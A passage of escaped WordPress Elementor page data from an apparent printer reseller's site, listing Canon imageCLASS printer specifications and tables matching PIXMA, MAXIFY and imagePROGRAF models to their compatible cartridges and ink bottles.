Fax<\\/li><li>Print Speed (A4): Up to 43ppm<\\/li><li>Recommended monthly print volume: 2,000 - 7,500 pages<\\/li><li>FPOT: 6.2secs. (A4)<\\/li><li>Max. paper input capacity: Up to 2,300 sheets<\\/li><li>Print Resolution: Up to 1200 x 1200dpi (equivalent)<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f3b97a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ef6036c\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF426dw\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1e51740\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png\",\"id\":2732}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6ca5e93\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>Compact 4-in-1 Black and White Multifunction for the smart business<\\/strong><\\/p><\\/div><p>With cutting-edge features, the MF426dw is set to boost work productivity in the modern office.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy, Fax<\\/li><li>Print Speed (A4): Up to 38ppm<\\/li><li>Recommended monthly print volume: 750 - 4,000 pages<\\/li><li>FPOT: 5.5secs. (A4)<\\/li><li>Max. paper input capacity: Up to 900 sheets<\\/li><li>Print Resolution: Up to 1200 x 1200dpi (equivalent)<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9f4fce1\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"45b0f85\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"d249821\",\"elType\":\"widget\",\"settings\":{\"title\":\"Cartridge Printers :-\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2dd6823\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"d81a183\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62697a3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>imagePROGRAF PRO-500<\\/p><\\/td><td width=\\\"208\\\"><p>Maintenance Cartridge MC-20<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Chroma Optimizer)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Matte Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Photo Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Photo Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Red)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>MAXIFY iB4170<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-2700 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>MAXIFY MB5070<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-2700 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>MAXIFY MB5170<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-2700 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>MAXIFY MB5370<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-2700 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>MAXIFY MB5470<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-2700 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E3170<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E410<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4c78b87\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"71e2027\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E4270<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E470<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E477<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E480<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E510<\\/p><\\/td><td width=\\\"208\\\"><p>CL-98 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-88 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E560<\\/p><\\/td><td width=\\\"208\\\"><p>CL-99 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-89 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E560 \\/ E560R<\\/p><\\/td><td width=\\\"208\\\"><p>CL-99 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-89 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G1000<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G1010<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G2010<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G3000<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G3010<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G4010<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP100<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-36 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-35 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP110<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-36 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-35 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP110 (with battery)<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-36 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-35 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP1300<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP2770 \\/ iP2772<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP2870S<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"13e8990\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"70107ac\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP4200<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP7270<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP8770<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iX6770<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-755XXL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iX6870<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-755XXL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG2570S<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG2577S<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td 